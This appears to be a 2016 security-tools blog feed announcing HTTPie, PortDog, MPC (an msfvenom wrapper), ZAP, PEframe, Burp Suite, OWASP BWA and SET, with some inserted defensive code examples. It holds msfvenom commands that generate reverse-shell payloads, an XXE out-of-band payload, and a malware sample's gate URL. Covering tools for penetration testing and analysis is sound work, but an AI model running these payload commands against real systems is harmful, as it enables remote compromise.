
Tuesday, January 5, 2016

HTTPie - a CLI, cURL-like tool for humans




HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use the GitHub API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects of the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123
$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is the detailed documentation. It covers the command syntax and advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example, :3000 would expand to http://localhost:3000. If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1



Monday, January 4, 2016

The Most Dangerous City on the Internet


Watch the documentary on cybercrime that presents the Romanian town called “Hackerville”, or the “most dangerous city on the Internet”. Convicted black-hat hackers, such as Guccifer (real name), talk about worms, viruses, social engineering, identity theft and even about breaking into Hillary Clinton's e-mail.


By: OffensiveSec 2016

PortDog - Simple Python Script to Detect Port Scanning Techniques




PortDog is a network anomaly detector aimed at detecting port scanning techniques. It is entirely written in Python and has an easy-to-use interface. It was tested on Ubuntu 15. Please note that it is not working on Windows OS due to problems capturing raw packets. I am working on making this script work on both platforms. In future, I'm thinking about adding firewall options that could block malicious attempts. It uses raw packets for analysis. For this reason, please ensure that you run this script from a privileged session.

Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
For example, if you want to detect for 5 minutes use:
sudo python portdog.py -t 5
For infinite detection use:
sudo python portdog.py -t 0

If you want to get the list of scanned ports, press CTRL+C to get the port list at runtime (if a scan happened).
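The core of a detector like the one described above is correlating connection attempts per source and counting distinct destination ports within a time window. The following added example (not PortDog's own code) does that over constructed packet records instead of a live raw-socket capture; the flag strings, window and threshold are assumptions chosen for the sample.

```python
from collections import defaultdict

WINDOW_SECONDS = 10    # span over which probes from one source are correlated
PORT_THRESHOLD = 15    # distinct destination ports inside the window that raise an alert

# TCP flag combinations that are probes rather than normal traffic. Keys are the
# flag letters sorted alphabetically (F=FIN, P=PSH, S=SYN, U=URG); anything
# else (SA, A, PA, R...) belongs to established flows or replies and is ignored.
PROBE_TECHNIQUES = {'S': 'SYN', '': 'NULL', 'F': 'FIN', 'FPU': 'XMAS'}


def classify(flags):
    """Map a flag string such as 'S', 'SA' or 'FPU' to a scan technique, or None."""
    return PROBE_TECHNIQUES.get(''.join(sorted(flags)))


def detect_scans(packets, window=WINDOW_SECONDS, threshold=PORT_THRESHOLD):
    """packets: iterable of (timestamp, src_ip, dst_port, flags) tuples.
    Returns {src_ip: {'techniques': [...], 'ports': [...]}} for every source that
    probed at least `threshold` distinct ports within any `window`-second span.
    Counting distinct ports, not packets, keeps a busy client that reconnects to
    one service many times from being flagged."""
    per_src = defaultdict(list)
    for ts, src, dport, flags in packets:
        technique = classify(flags)
        if technique:
            per_src[src].append((ts, dport, technique))

    alerts = {}
    for src, events in per_src.items():
        events.sort()
        in_window = defaultdict(int)   # port -> probes to it inside the sliding window
        lo = 0
        for ts, dport, _ in events:
            in_window[dport] += 1
            while events[lo][0] < ts - window:   # expire probes older than the window
                old_port = events[lo][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                lo += 1
            if len(in_window) >= threshold:
                alerts[src] = {
                    'techniques': sorted({e[2] for e in events}),
                    'ports': sorted({e[1] for e in events}),   # the "scanned ports" list
                }
                break
    return alerts


def constructed_packets():
    """Constructed sample traffic (not a real capture): two scanners, two benign sources."""
    pkts = []
    for i, port in enumerate(range(20, 41)):          # SYN scan: 21 ports in ~2 seconds
        pkts.append((100.0 + i * 0.1, '10.0.0.5', port, 'S'))
    for i in range(30):                                # busy client: 30 connections to 443 only
        pkts.append((100.0 + i * 0.2, '10.0.0.9', 443, 'S'))
        pkts.append((100.1 + i * 0.2, '10.0.0.9', 443, 'A'))
    for i, port in enumerate(range(1, 21)):           # Xmas scan: FIN+PSH+URG to 20 ports
        pkts.append((200.0 + i * 0.05, '10.0.0.7', port, 'FPU'))
    for i, port in enumerate(range(8000, 8020)):      # slow probing: one port every 30 s
        pkts.append((300.0 + i * 30, '10.0.0.8', port, 'S'))
    return pkts


if __name__ == '__main__':
    for src, info in detect_scans(constructed_packets()).items():
        print(f"{src}: {'/'.join(info['techniques'])} scan of {len(info['ports'])} ports")
```

The slow prober at 10.0.0.8 is missed with a 10-second window and only shows up with a much longer one, which is the usual trade-off between window length, memory and false positives.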



MPC - Msfvenom Payload Creator



Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce a payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and being able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will not try to bypass any anti-virus solutions.

Install
  • Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc


Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)

[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP.
[i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port.
[i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt.
[i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP.
[i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
[i] /usr/bin/mpc help verbose # This help screen, with even more information.

[i] <TYPE>:
[i] + ASP
[i] + ASPX
[i] + Bash [.sh]
[i] + Java [.jsp]
[i] + Linux [.elf]
[i] + OSX [.macho]
[i] + Perl [.pl]
[i] + PHP
[i] + Powershell [.ps1]
[i] + Python [.py]
[i] + Tomcat [.war]
[i] + Windows [.exe]

[i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
[i] Missing <DOMAIN/IP> will default to the IP menu.

[i] Missing <PORT> will default to 443.

[i] <CMD> is a standard/native command prompt/terminal to interactive with.
[i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
[i] Missing <CMD/MSF> will default to <MSF> where possible.
[i] Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
[i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
[i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

[i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
[i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
[i] Missing <BIND/REVERSE> will default to <REVERSE>.
[i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

[i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
[i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
[i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
[i] Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
[i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
[i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
[i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
[i] https://www.offensive-security.com/metasploit-unleashed/payload-types/
[i] https://www.offensive-security.com/metasploit-unleashed/payloads/

[i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
[i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
[i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
[i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
[i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

[i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
[i] <LOOP> will just create one of each <TYPE>.

[i] <VERBOSE> will display more information.
root@kali:~#


Example #1 (Windows, Fully Automated With IP)
root@kali:~# mpc windows 192.168.1.10
[*] Msfvenom Payload Creator (MPC v1.3)
[i] IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
[i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)
root@kali:~# ./mpc elf eth0 4444
[*] Msfvenom Payload Creator (MPC v1.3)
[i] IP: 192.168.103.238
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
[i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
[i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
[*] Msfvenom Payload Creator (MPC v1.3)

[i] Use which interface/IP address?:
[i] 1.) eth0 - 192.168.103.238
[i] 2.) eth1 - 192.168.155.175
[i] 3.) tap0 - 10.10.100.63
[i] 4.) lo - 127.0.0.1
[i] 5.) wan - xx.xx.xx.xx
[?] Select 1-5, interface or IP address: 3

[i] IP: 10.10.100.63
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] SHELL: shell
[i] DIRECTION: reverse
[i] STAGE: stageless
[i] METHOD: tcp
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
[i] File: ASCII text, with very long lines, with no line terminators
[i] Size: 4.0K
[i] MD5: 53452eafafe21bff94e6c4621525165b
[i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)



OWASP ZAP 2.4.1 - Penetration Testing Tool for Testing Web Applications



The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Release 2.4.1

This release includes important security fixes - users are urged to upgrade asap.

One of the changes means that an API key is created by default, which means that any applications using the ZAP API will fail unless they are updated to use that key. The API key can be found in the API Options screen. You can also set it from the command line using an option like:
-config api.key=change-me-9203935709
The following changes were made in this release:

Enhancements:
  • Issue 321 : Support multiple databases
  • Issue 1459 : Add an HTTP sender listener script
  • Issue 1500 : Update Bouncy Castle libs
  • Issue 1566 : Improve active scan's reported progress
  • Issue 1573 : Add option to inject plugin ID in header for all ascan requests
  • Issue 1607 : Unable to save the test session via API
  • Issue 1621 : AScan API - Allow to scan as an user
  • Issue 1625 : Support multiple structural params and ones on top level nodes
  • Issue 1653 : Support context menu key for trees
  • Issue 1655 : Copy Session Token from Http Sessions tab to clipboard
  • Issue 1662 : Add default Rails anti-CSRF token parameter
  • Issue 1664 : Clients tab autoscroll
  • Issue 1684 : Unable to set technology via API
  • Issue 1688 : Updating owasp/zap2docker image with Python Client API
  • Issue 1690 : Bump key pair size to 2048 for all certs in the (proxy's) chain of trust
  • Issue 1695 : Change SSL cert signature algorithm to "SHA-256 with RSA Encryption"
  • Issue 1699 : Allow ApiImplementor's to add custom headers
  • Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
  • Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS

Bug fixes:
  • Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
  • Issue 1442 : Up/Down arrow keys in results stop working if "reflected"
  • Issue 1473 : Spider does not handle URLs extracted from meta tags correctly
  • Issue 1497 : The spider is extracting and reporting links from comments - event when instructed not to do so
  • Issue 1598 : startup script lacks support for FreeBSD
  • Issue 1615 : Search "All" option not working
  • Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when running in daemon mode on headless machine
  • Issue 1618 : Target Technology Not Honored
  • Issue 1619 : Search regex might not be validated
  • Issue 1624 : Error while loading ZAP 2.4.0
  • Issue 1626 : Structural parameters not saved when context exported and not available via the API
  • Issue 1636 : Users (for auth) & Forced User not loaded from session
  • Issue 1647 : Wrong reference in Zest Result
  • Issue 1674 : Ajax spider not considering get parameters
  • Issue 1677 : Fuzzers can't be expanded on OS X
  • Issue 1694 : "Error: setting file is missing. Program will exit." even if file exists
  • Issue 1698 : Escape API exceptions
  • Issue 1700 : Forced Browse Lists Missing from Drop-Down in 2.4.0
  • Issue 1706 : Add API security options
  • Issue 1708 : Context's technology tree can get out of sync
  • Issue 1709 : Applications are not (immediately) shown after start
  • Issue 1714 : PNH should not reflect API key unless user supplies it
  • Issue 1716 : Restrict use of CORS header in pnh
  • Issue 1720 : Add more security options for JSONP API
  • Issue 1724 : Ensure API component names are escaped in the HTML output
  • Issue 1735 : Context's technologies not used in active scan unless overridden


PEframe - Tool to perform static analysis on Portable Executable malware


PEframe is an open source tool to perform static analysis on Portable Executable malware.

Usage
$ peframe malware.exe
$ peframe [--option] malware.exe

Options
--json          Output in JSON

--import        Imported functions and DLLs
--export        Exported functions and DLLs

--dir-import    Import directory
--dir-export    Export directory
--dir-resource  Resource directory
--dir-debug     Debug directory
--dir-tls       TLS directory

--strings       Get all strings
--sections      Sections information
--dump          Dump all information

Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git

$ cd peframe

# python setup.py install

Example
$ peframe malware.exe

Short information
------------------------------------------------------------
File Name malware.exe
File Size 935281 byte
Compile Time 2012-01-29 22:32:28
DLL False
Sections 4
Hash MD5 cae18bdb8e9ef082816615e033d2d85b
Hash SAH1 546060ad10a766e0ecce1feb613766a340e875c0
Imphash 353cf96592db561b5ab4e408464ac6ae
Detected Xor, Sign, Packer, Anti Debug, Anti VM
Directory Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length Offset (hex) Offset (dec)
1 0x5df4e 384846
2 0x5df4e 384846
4 0x5df4e 384846
8 0x5df4e 384846

Digital Signature
------------------------------------------------------------
Virtual Address 12A200
Block Size 4813 byte
Hash MD5 63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1 53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer Microsoft Visual C++ v6.0
Packer Microsoft Visual C++ 5.0
Packer Microsoft Visual C++
Packer Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug FindWindowExW
Anti Debug FindWindowW
Anti Debug GetWindowThreadProcessId
Anti Debug IsDebuggerPresent
Anti Debug OutputDebugStringW
Anti Debug Process32FirstW
Anti Debug Process32NextW
Anti Debug TerminateProcess
Anti Debug UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick Virtual Box
Trick VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function CreateDirectoryA
Function CreateFileA
Function CreateFileMappingA
Function CreateToolhelp32Snapshot
Function DeleteFileA
Function FindFirstFileA
Function FindNextFileA
Function GetCurrentProcess
Function GetFileAttributesA
Function GetFileSize
Function GetModuleHandleA
Function GetProcAddress
Function GetTempPathA
Function GetTickCount
Function GetUserNameA
Function GetVersionExA
Function InternetCrackUrlA
Function LoadLibraryA
Function MapViewOfFile
Function OpenProcess
Function Process32First
Function Process32Next
Function RegCloseKey
Function RegCreateKeyA
Function RegEnumKeyExA
Function RegOpenKeyA
Function RegOpenKeyExA
Function Sleep
Function WSAStartup
Function WriteFile
Function closesocket
Function connect
Function recv
Function send
Function socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section .data
Hash MD5 b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1 523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section .rdata
Hash MD5 41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1 b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary wiseftpsrvs.bin
Data ESTdb2.dat
Data Favorites.dat
Data History.dat
Data bookmark.dat
Data fireFTPsites.dat
Data quick.dat
Data site.dat
Data sites.dat
Database FTPList.db
Database sites.db
Database NovaFTP.db
Executable unleap.exe
Executable explorer.exe
FTP Config FTPVoyager.ftp
Library crypt32.dll
Library kernel32.dll
Library mozsqlite3.dll
Library userenv.dll
Library wand.dat
Library wininet.dll
Library wsock32.dll
Text Connections.txt
Text ftplist.txt
Text signons.txt
Text signons2.txt
Text signons3.txt

Url discovered [2]
------------------------------------------------------------
Url RhinoSoft.com
Url http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript AutoIt v3 Script
FileVersion 3, 3, 8, 1
FileDescription
Translation 0x0809 0x04b0
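The "XOR discovered" table above reports a key length and an offset. One way such a check works is known-plaintext search: the DOS stub text "This program cannot be run in DOS mode" is present in virtually every PE, so an XOR-encoded embedded executable can be found by deriving a candidate key from that string at every offset and checking that the key repeats. The following is an added example of that technique, not PEframe's own code, run on a constructed blob rather than a real sample; the 0x4E stub-text offset is the standard MS-DOS stub layout.

```python
KNOWN_PLAINTEXT = b'This program cannot be run in DOS mode'
STUB_TEXT_OFFSET = 0x4E   # where that text sits in a standard MS-DOS stub, relative to 'MZ'


def find_xor_keys(data, key_lengths=(1, 2, 4, 8), known=KNOWN_PLAINTEXT):
    """Return [(key_length, offset, key), ...] for every offset at which `known`
    appears XOR-encoded with a repeating key of one of the given lengths. The key
    is derived from the first key_length bytes and must explain the whole string;
    an all-zero key means the text is present in clear and is not reported."""
    hits = []
    n = len(known)
    for klen in key_lengths:
        for off in range(len(data) - n + 1):
            window = data[off:off + n]
            key = bytes(window[i] ^ known[i] for i in range(klen))
            if not any(key):
                continue
            if all(window[i] ^ known[i] == key[i % klen] for i in range(n)):
                hits.append((klen, off, key))
    return hits


def xor_decode(data, key, key_offset):
    """XOR `data` with the repeating `key`, phased so key[0] applies at key_offset
    (the offset returned by find_xor_keys); bytes before it decode correctly too,
    which is what lets the MZ header in front of the stub text be carved out."""
    klen = len(key)
    return bytes(b ^ key[(i - key_offset) % klen] for i, b in enumerate(data))


def build_sample():
    """Constructed sample (not a real malware file): 256 bytes of filler followed
    by a fake MZ header whose DOS stub is XOR-encoded with the 2-byte key 5a a7.
    Returns (blob, offset_of_MZ)."""
    filler = bytes(range(256))
    stub = (b'MZ' + b'\x90' * (STUB_TEXT_OFFSET - 2)
            + KNOWN_PLAINTEXT + b'.\r\r\n$' + b'\x00' * 16)
    key = b'\x5a\xa7'
    encoded = bytes(b ^ key[i % len(key)] for i, b in enumerate(stub))
    return filler + encoded, len(filler)


if __name__ == '__main__':
    blob, mz_at = build_sample()
    print('Key length  Offset (hex)  Offset (dec)  Key')
    for klen, off, key in find_xor_keys(blob):
        print(f'{klen:<11} 0x{off:<11x} {off:<13} {key.hex()}')
```

A short key also satisfies every longer multiple of its length, so one encoded string is reported at the same offset for several key lengths, the same pattern as the four rows in the output above.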




Burp Suite Professional v1.6.23 - The Leading Toolkit for Web Application Security Testing




Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net">%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

The release also fixes some issues:

  • Some bugs affecting the saving and restoring of Burp state files.
  • A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.
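The payload quoted above only pays off when the receiving XML parser resolves the SYSTEM URL of the parameter entity. On the defending side the check is the mirror image: refuse any DOCTYPE that declares an external subset or a SYSTEM/PUBLIC entity before anything is resolved. This added example (not Burp's or PortSwigger's code) does that with Python's stdlib expat parser, whose handlers fire on the declaration itself; the probe document is constructed after the quoted payload with a placeholder listener host.

```python
import xml.parsers.expat


class Rejected(Exception):
    """Raised from inside an expat handler; expat stops and re-raises it from Parse()."""


def inspect_xml(data, allow_internal_dtd=False):
    """Parse `data` and return (accepted, detail).

    accepted is False when the document declares an external DTD subset or any
    SYSTEM/PUBLIC entity (general or parameter), i.e. anything that would make a
    resolving parser contact a URL of the sender's choosing. With the default
    allow_internal_dtd=False every DOCTYPE is refused, which also rules out
    internal entity-expansion tricks. On success, detail is the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise Rejected(f'DOCTYPE {name} loads external subset {system_id!r}')
        if not allow_internal_dtd:
            raise Rejected(f'DOCTYPE {name} not allowed')

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            kind = 'parameter' if is_param else 'general'
            raise Rejected(f'external {kind} entity {name!r} -> {system_id!r}')

    def start_element(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start_element
    try:
        parser.Parse(data, True)
    except Rejected as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f'malformed XML: {exc}'
    return True, root[0] if root else ''


# Constructed probe with the same shape as the payload quoted above; the listener
# host is a placeholder, and a root element is appended so the document is complete.
OOB_PROBE = (b"<?xml version='1.0' standalone='no'?>"
             b'<!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://oob-listener.example">%f5a30; ]>'
             b'<foo/>')
EXTERNAL_SUBSET = b'<!DOCTYPE foo SYSTEM "http://oob-listener.example/foo.dtd"><foo/>'
HARMLESS_DTD = b'<!DOCTYPE d [<!ENTITY greet "hello">]><d>&greet;</d>'

if __name__ == '__main__':
    for doc in (b'<doc><a>1</a></doc>', OOB_PROBE, EXTERNAL_SUBSET, HARMLESS_DTD):
        print(inspect_xml(doc), inspect_xml(doc, allow_internal_dtd=True))
```

Run over captured request bodies, the `detail` strings double as detection output: a rejected parameter entity pointing at an unknown host is exactly the interaction Burp is looking for.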


BWA - OWASP Broken Web Applications Project



A collection of vulnerable web applications that is distributed on a Virtual Machine.

Description

The Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:
  • learning about web application security
  • testing manual assessment techniques
  • testing automated tools
  • testing source code analysis tools
  • observing web attacks
  • testing WAFs and similar code technologies

All the while saving people interested in learning or testing the pain of having to compile, configure, and catalog everything normally involved in setting this up from scratch.



SET v6.5 - The Social-Engineer Toolkit “Mr Robot”



The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 12 months since its release, “Metasploit: The Penetration Tester’s Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

The next major revision of The Social-Engineer Toolkit (SET) v6.5 codename “Mr Robot” has just been released. The codename is in celebration of the TV show Mr Robot featuring SET last night! Kudos to them for having some amazing tech writers and appreciate the shoutout on the show.


This version incorporates a new HTA web attack vector (thanks to Justin Elze aka ginger for sharing the attack vector with me). This attack allows you to clone a website and inject an HTA file which compromises the system.

